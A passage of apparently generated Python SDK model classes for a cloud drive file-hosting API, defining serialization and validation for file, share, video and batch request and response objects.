    """HTTP-layer wrapper: response headers plus a HostingCopyFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingCopyFileResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = HostingCopyFileResponse().from_map(m['body'])
        return self
class CreateFileModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a HostingCreateFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingCreateFileResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = HostingCreateFileResponse().from_map(m['body'])
        return self
class DeleteFileModel(TeaModel):
    """HTTP-layer wrapper for a bodiless delete-file response (headers only)."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        self.headers = headers
    def validate(self):
        # nothing is required for a header-only response
        pass
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        return self
class GetFileModel(TeaModel):
    """HTTP-layer wrapper: response headers plus a HostingGetFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingGetFileResponse = None,
    ):
        self.headers = headers
        self.body = body
    def validate(self):
        # the body is mandatory; cascade validation into it when present
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        d = dict()
        if self.headers is not None:
            d['headers'] = self.headers
        if self.body is not None:
            d['body'] = self.body.to_map()
        return d
    def from_map(self, m: dict = None):
        m = m or dict()
        hdrs = m.get('headers')
        if hdrs is not None:
            self.headers = hdrs
        if m.get('body') is not None:
            self.body = HostingGetFileResponse().from_map(m['body'])
        return self
class GetDownloadUrlModel(TeaModel):
    """Wraps a get-download-url call result: response headers plus a HostingGetDownloadUrlResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingGetDownloadUrlResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingGetDownloadUrlResponse().from_map(raw_body)
        return self
class GetSecureUrlModel(TeaModel):
    """Wraps a get-secure-url call result: response headers plus a HostingGetSecureUrlResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingGetSecureUrlResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingGetSecureUrlResponse().from_map(raw_body)
        return self
class GetUploadUrlModel(TeaModel):
    """Wraps a get-upload-url call result: response headers plus a HostingGetUploadUrlResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingGetUploadUrlResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingGetUploadUrlResponse().from_map(raw_body)
        return self
class ListFileModel(TeaModel):
    """Wraps a list-file call result: response headers plus a HostingListFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingListFileResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingListFileResponse().from_map(raw_body)
        return self
class ListUploadedPartsModel(TeaModel):
    """Wraps a list-uploaded-parts call result: response headers plus a HostingListUploadedPartResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingListUploadedPartResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingListUploadedPartResponse().from_map(raw_body)
        return self
class MoveFileModel(TeaModel):
    """Wraps a move-file call result: response headers plus a HostingMoveFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingMoveFileResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingMoveFileResponse().from_map(raw_body)
        return self
class VideoDefinitionModel(TeaModel):
    """Wraps a video-definition call result: response headers plus a HostingVideoDefinitionResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingVideoDefinitionResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingVideoDefinitionResponse().from_map(raw_body)
        return self
class VideoLicenseModel(TeaModel):
    """Wraps a video-DRM-license call result: response headers plus a HostingVideoDRMLicenseResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingVideoDRMLicenseResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingVideoDRMLicenseResponse().from_map(raw_body)
        return self
class VideoM3u8Model(TeaModel):
    """Wraps a video-m3u8 call result: response headers plus a raw bytes body (no model type)."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: bytes = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # raw playlist content; stored/serialized as-is, never deserialized
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = raw_body
        return self
class VideoTranscodeModel(TeaModel):
    """Wraps a video-transcode call result: response headers plus a HostingVideoTranscodeResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: HostingVideoTranscodeResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = HostingVideoTranscodeResponse().from_map(raw_body)
        return self
class CreateShareModel(TeaModel):
    """Wraps a create-share call result: response headers plus a CreateShareResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: CreateShareResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = CreateShareResponse().from_map(raw_body)
        return self
class DeleteShareModel(TeaModel):
    """Wraps a delete-share call result: response headers only (no body)."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
    ):
        # raw HTTP response headers
        self.headers = headers

    def validate(self):
        pass

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        return self
class GetShareModel(TeaModel):
    """Wraps a get-share call result: response headers plus a GetShareResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: GetShareResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = GetShareResponse().from_map(raw_body)
        return self
class ListShareModel(TeaModel):
    """Wraps a list-share call result: response headers plus a ListShareResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListShareResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = ListShareResponse().from_map(raw_body)
        return self
class UpdateShareModel(TeaModel):
    """Wraps an update-share call result: response headers plus an UpdateShareResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: UpdateShareResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = UpdateShareResponse().from_map(raw_body)
        return self
class ListStorefileModel(TeaModel):
    """Wraps a list-store-file call result: response headers plus a ListStoreFileResponse body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: ListStoreFileResponse = None,
    ):
        # raw HTTP response headers
        self.headers = headers
        # deserialized response payload (required)
        self.body = body

    def validate(self):
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        mapping = {}
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.body is not None:
            mapping['body'] = self.body.to_map()
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        headers = source.get('headers')
        if headers is not None:
            self.headers = headers
        raw_body = source.get('body')
        if raw_body is not None:
            self.body = ListStoreFileResponse().from_map(raw_body)
        return self
class BaseCompleteFileRequest(TeaModel):
    """
    Base request for completing a multipart file upload.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # extra key/value payload forwarded with the request
        self.addition_data = addition_data
        # numeric drive identifier
        self.drive_id = drive_id
        # descriptors of the uploaded parts to merge
        self.part_info_list = part_info_list
        self.share_id = share_id
        # multipart upload session identifier
        self.upload_id = upload_id

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()

    def to_map(self):
        mapping = {}
        if self.addition_data is not None:
            mapping['addition_data'] = self.addition_data
        if self.drive_id is not None:
            mapping['drive_id'] = self.drive_id
        mapping['part_info_list'] = []
        if self.part_info_list is not None:
            mapping['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.share_id is not None:
            mapping['share_id'] = self.share_id
        if self.upload_id is not None:
            mapping['upload_id'] = self.upload_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('addition_data') is not None:
            self.addition_data = source.get('addition_data')
        if source.get('drive_id') is not None:
            self.drive_id = source.get('drive_id')
        self.part_info_list = []
        if source.get('part_info_list') is not None:
            self.part_info_list = [
                UploadPartInfo().from_map(part) for part in source.get('part_info_list')
            ]
        if source.get('share_id') is not None:
            self.share_id = source.get('share_id')
        if source.get('upload_id') is not None:
            self.upload_id = source.get('upload_id')
        return self
class BaseCreateFileRequest(TeaModel):
    """
    Base request for creating a file entry before uploading its content.
    """
    def __init__(
        self,
        addition_data: dict = None,
        content_md_5: str = None,
        content_type: str = None,
        name: str = None,
        part_info_list: List[UploadPartInfo] = None,
        size: int = None,
        type: str = None,
    ):
        # extra key/value payload forwarded with the request
        self.addition_data = addition_data
        # MD5 of the file content (serialized as 'content_md5')
        self.content_md_5 = content_md_5
        # MIME content type
        self.content_type = content_type
        # file name (required, max 1024 chars)
        self.name = name
        # descriptors of the upload parts
        self.part_info_list = part_info_list
        # file size in bytes (0 .. 50 GiB)
        self.size = size
        # entry type (required)
        self.type = type

    def validate(self):
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_max_length(self.name, 'name', 1024)
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        self.validate_required(self.type, 'type')

    def to_map(self):
        mapping = {}
        if self.addition_data is not None:
            mapping['addition_data'] = self.addition_data
        if self.content_md_5 is not None:
            mapping['content_md5'] = self.content_md_5
        if self.content_type is not None:
            mapping['content_type'] = self.content_type
        if self.name is not None:
            mapping['name'] = self.name
        mapping['part_info_list'] = []
        if self.part_info_list is not None:
            mapping['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.size is not None:
            mapping['size'] = self.size
        if self.type is not None:
            mapping['type'] = self.type
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('addition_data') is not None:
            self.addition_data = source.get('addition_data')
        if source.get('content_md5') is not None:
            self.content_md_5 = source.get('content_md5')
        if source.get('content_type') is not None:
            self.content_type = source.get('content_type')
        if source.get('name') is not None:
            self.name = source.get('name')
        self.part_info_list = []
        if source.get('part_info_list') is not None:
            self.part_info_list = [
                UploadPartInfo().from_map(part) for part in source.get('part_info_list')
            ]
        if source.get('size') is not None:
            self.size = source.get('size')
        if source.get('type') is not None:
            self.type = source.get('type')
        return self
class BaseFileProcessRequest(TeaModel):
    """
    Base request carrying image/video processing options for file APIs.
    """
    def __init__(
        self,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        video_thumbnail_process: str = None,
    ):
        # candidate aspect ratios for image cropping
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # video_thumbnail_process
        # type: string
        # (fixed: was a stray bare `type:string` annotation statement emitted
        # by the code generator instead of a comment)
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        if self.image_cropping_aspect_ratios is not None:
            result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('image_cropping_aspect_ratios') is not None:
            self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class BaseFileRequest(TeaModel):
    """
    Common base for file-operation requests; carries only addition_data.
    """
    def __init__(
        self,
        addition_data: dict = None,
    ):
        # extra key/value payload forwarded with the request
        self.addition_data = addition_data

    def validate(self):
        pass

    def to_map(self):
        mapping = {}
        if self.addition_data is not None:
            mapping['addition_data'] = self.addition_data
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        extra = source.get('addition_data')
        if extra is not None:
            self.addition_data = extra
        return self
class BaseGetUploadUrlRequest(TeaModel):
    """
    Base request for fetching pre-signed upload URLs of a multipart upload.
    """
    def __init__(
        self,
        content_md_5: str = None,
        drive_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        share_id: str = None,
        upload_id: str = None,
    ):
        # MD5 of the content (serialized as 'content_md5', max 32 chars)
        self.content_md_5 = content_md_5
        # numeric drive identifier
        self.drive_id = drive_id
        # parts to obtain upload URLs for
        self.part_info_list = part_info_list
        self.share_id = share_id
        # multipart upload session identifier (required)
        self.upload_id = upload_id

    def validate(self):
        if self.content_md_5 is not None:
            self.validate_max_length(self.content_md_5, 'content_md_5', 32)
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.part_info_list:
            for part in self.part_info_list:
                if part:
                    part.validate()
        self.validate_required(self.upload_id, 'upload_id')

    def to_map(self):
        mapping = {}
        if self.content_md_5 is not None:
            mapping['content_md5'] = self.content_md_5
        if self.drive_id is not None:
            mapping['drive_id'] = self.drive_id
        mapping['part_info_list'] = []
        if self.part_info_list is not None:
            mapping['part_info_list'] = [
                part.to_map() if part else None for part in self.part_info_list
            ]
        if self.share_id is not None:
            mapping['share_id'] = self.share_id
        if self.upload_id is not None:
            mapping['upload_id'] = self.upload_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('content_md5') is not None:
            self.content_md_5 = source.get('content_md5')
        if source.get('drive_id') is not None:
            self.drive_id = source.get('drive_id')
        self.part_info_list = []
        if source.get('part_info_list') is not None:
            self.part_info_list = [
                UploadPartInfo().from_map(part) for part in source.get('part_info_list')
            ]
        if source.get('share_id') is not None:
            self.share_id = source.get('share_id')
        if source.get('upload_id') is not None:
            self.upload_id = source.get('upload_id')
        return self
class BaseImageProcessRequest(TeaModel):
    """
    Base request carrying image-processing options.
    """
    def __init__(
        self,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        video_thumbnail_process: str = None,
    ):
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # video_thumbnail_process
        # type: string
        # (fixed: was a stray bare `type:string` annotation statement emitted
        # by the code generator instead of a comment)
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        pass

    def to_map(self):
        result = dict()
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class BaseListFileRequest(TeaModel):
    """
    Base request for paginated file listing.
    """
    def __init__(
        self,
        addition_data: dict = None,
        drive_id: str = None,
        image_cropping_aspect_ratios: List[str] = None,
        image_thumbnail_process: str = None,
        image_url_process: str = None,
        limit: int = None,
        marker: str = None,
        referer: str = None,
        share_id: str = None,
        sign_token: str = None,
        video_thumbnail_process: str = None,
    ):
        # extra key/value payload forwarded with the request
        self.addition_data = addition_data
        # numeric drive identifier
        self.drive_id = drive_id
        # candidate aspect ratios for image cropping
        self.image_cropping_aspect_ratios = image_cropping_aspect_ratios
        # image_thumbnail_process
        self.image_thumbnail_process = image_thumbnail_process
        # image_url_process
        self.image_url_process = image_url_process
        # page size, 0..100
        self.limit = limit
        # pagination marker from the previous page
        self.marker = marker
        self.referer = referer
        # share_id, either share_id or drive_id is required
        self.share_id = share_id
        self.sign_token = sign_token
        # video_thumbnail_process
        # type: string
        # (fixed: was a stray bare `type:string` annotation statement emitted
        # by the code generator instead of a comment)
        self.video_thumbnail_process = video_thumbnail_process

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.limit is not None:
            self.validate_maximum(self.limit, 'limit', 100)
            self.validate_minimum(self.limit, 'limit', 0)

    def to_map(self):
        result = dict()
        if self.addition_data is not None:
            result['addition_data'] = self.addition_data
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.image_cropping_aspect_ratios is not None:
            result['image_cropping_aspect_ratios'] = self.image_cropping_aspect_ratios
        if self.image_thumbnail_process is not None:
            result['image_thumbnail_process'] = self.image_thumbnail_process
        if self.image_url_process is not None:
            result['image_url_process'] = self.image_url_process
        if self.limit is not None:
            result['limit'] = self.limit
        if self.marker is not None:
            result['marker'] = self.marker
        if self.referer is not None:
            result['referer'] = self.referer
        if self.share_id is not None:
            result['share_id'] = self.share_id
        if self.sign_token is not None:
            result['sign_token'] = self.sign_token
        if self.video_thumbnail_process is not None:
            result['video_thumbnail_process'] = self.video_thumbnail_process
        return result

    def from_map(self, m: dict = None):
        m = m or dict()
        if m.get('addition_data') is not None:
            self.addition_data = m.get('addition_data')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('image_cropping_aspect_ratios') is not None:
            self.image_cropping_aspect_ratios = m.get('image_cropping_aspect_ratios')
        if m.get('image_thumbnail_process') is not None:
            self.image_thumbnail_process = m.get('image_thumbnail_process')
        if m.get('image_url_process') is not None:
            self.image_url_process = m.get('image_url_process')
        if m.get('limit') is not None:
            self.limit = m.get('limit')
        if m.get('marker') is not None:
            self.marker = m.get('marker')
        if m.get('referer') is not None:
            self.referer = m.get('referer')
        if m.get('share_id') is not None:
            self.share_id = m.get('share_id')
        if m.get('sign_token') is not None:
            self.sign_token = m.get('sign_token')
        if m.get('video_thumbnail_process') is not None:
            self.video_thumbnail_process = m.get('video_thumbnail_process')
        return self
class BaseMoveFileRequest(TeaModel):
    """
    Base request for moving a file (optionally renaming it).
    """
    def __init__(
        self,
        drive_id: str = None,
        new_name: str = None,
        share_id: str = None,
    ):
        # numeric drive identifier (required)
        self.drive_id = drive_id
        # new file name after the move (max 1024 chars)
        self.new_name = new_name
        self.share_id = share_id

    def validate(self):
        self.validate_required(self.drive_id, 'drive_id')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.new_name is not None:
            self.validate_max_length(self.new_name, 'new_name', 1024)

    def to_map(self):
        mapping = {}
        if self.drive_id is not None:
            mapping['drive_id'] = self.drive_id
        if self.new_name is not None:
            mapping['new_name'] = self.new_name
        if self.share_id is not None:
            mapping['share_id'] = self.share_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('drive_id') is not None:
            self.drive_id = source.get('drive_id')
        if source.get('new_name') is not None:
            self.new_name = source.get('new_name')
        if source.get('share_id') is not None:
            self.share_id = source.get('share_id')
        return self
class BatchSubRequest(TeaModel):
    """
    One sub-request inside a batch call.
    """
    def __init__(
        self,
        body: dict = None,
        headers: dict = None,
        id: str = None,
        method: str = None,
        url: str = None,
    ):
        # sub-request parameters as a JSON-compatible dict; when set, `headers`
        # must carry the matching "Content-Type" (currently "application/json")
        self.body = body
        # request headers describing the body's content type
        self.headers = headers
        # correlates this sub-request with its sub-response; must be unique
        self.id = id
        # HTTP method of the sub-request (required)
        self.method = method
        # API path of the sub-request (required); see the sub-request docs
        self.url = url

    def validate(self):
        self.validate_required(self.id, 'id')
        self.validate_required(self.method, 'method')
        self.validate_required(self.url, 'url')

    def to_map(self):
        mapping = {}
        if self.body is not None:
            mapping['body'] = self.body
        if self.headers is not None:
            mapping['headers'] = self.headers
        if self.id is not None:
            mapping['id'] = self.id
        if self.method is not None:
            mapping['method'] = self.method
        if self.url is not None:
            mapping['url'] = self.url
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('body') is not None:
            self.body = source.get('body')
        if source.get('headers') is not None:
            self.headers = source.get('headers')
        if source.get('id') is not None:
            self.id = source.get('id')
        if source.get('method') is not None:
            self.method = source.get('method')
        if source.get('url') is not None:
            self.url = source.get('url')
        return self
class BatchRequest(TeaModel):
    """
    Batch request: a collection of sub-requests against one resource type.
    """
    def __init__(
        self,
        requests: List[BatchSubRequest] = None,
        resource: str = None,
    ):
        # the sub-requests to execute (required)
        self.requests = requests
        # resource type the sub-requests operate on (required)
        self.resource = resource

    def validate(self):
        self.validate_required(self.requests, 'requests')
        if self.requests:
            for sub in self.requests:
                if sub:
                    sub.validate()
        self.validate_required(self.resource, 'resource')

    def to_map(self):
        mapping = {}
        mapping['requests'] = []
        if self.requests is not None:
            mapping['requests'] = [
                sub.to_map() if sub else None for sub in self.requests
            ]
        if self.resource is not None:
            mapping['resource'] = self.resource
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        self.requests = []
        if source.get('requests') is not None:
            self.requests = [
                BatchSubRequest().from_map(sub) for sub in source.get('requests')
            ]
        if source.get('resource') is not None:
            self.resource = source.get('resource')
        return self
class CCPGetDirSizeInfoRequest(TeaModel):
    """
    Request for the size information of a directory.
    """
    def __init__(
        self,
        drive_id: str = None,
        file_id: str = None,
        share_id: str = None,
    ):
        # numeric drive identifier
        self.drive_id = drive_id
        # directory file identifier (required)
        self.file_id = file_id
        # share_id, either share_id or drive_id is required
        self.share_id = share_id

    def validate(self):
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        self.validate_required(self.file_id, 'file_id')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')

    def to_map(self):
        mapping = {}
        if self.drive_id is not None:
            mapping['drive_id'] = self.drive_id
        if self.file_id is not None:
            mapping['file_id'] = self.file_id
        if self.share_id is not None:
            mapping['share_id'] = self.share_id
        return mapping

    def from_map(self, m: dict = None):
        source = m or {}
        if source.get('drive_id') is not None:
            self.drive_id = source.get('drive_id')
        if source.get('file_id') is not None:
            self.file_id = source.get('file_id')
        if source.get('share_id') is not None:
            self.share_id = source.get('share_id')
        return self
class CancelShareLinkRequest(TeaModel):
    """
    Request for cancelling a share link.
    """
    def __init__(
        self,
        share_id: str = None,
    ):
        # identifier of the share to cancel
        self.share_id = share_id

    def validate(self):
        pass

    def to_map(self):
        mapping = {}
        if self.share_id is not None:
